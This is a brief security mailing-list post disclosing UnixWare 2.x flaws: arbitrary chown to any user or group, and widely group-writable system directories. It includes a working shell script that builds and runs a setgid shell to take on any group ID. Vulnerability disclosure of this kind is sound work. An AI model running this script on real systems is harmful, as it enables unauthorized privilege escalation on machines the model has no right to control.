More on UnixWare 2.x vulnerability

[tv () pobox com (Todd Vierling)]

I've found out a more about UnixWare 2.  It seems the system (and I don't
know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer)
allows chown'ing a file *to* any arbitrary user and group.  Hm, lessee.
Create a file that uses up all the available space in /tmp, then chown it
root:bin.  Okay, now someone else tell me who created that file.

Anyway, back to the setgid problem.  I've found an exploit script (it's not
all that difficult to do by hand, anyway...) on an FTP site pointed to by
the floating post about this bug.  It follows.  While browsing the default
installation of UnixWare, it seems a couple *hundred* directories, including
particularly /usr/bin, /sbin, and /usr/sbin, are writable by group.  This is
bad, very bad.

=====

#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup <groupid>)
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
int main(void) { setgid(getegid()); execl("/bin/sh", "-", 0); }
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$
/tmp/.$$
rm -f /tmp/.$$

=====
== Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==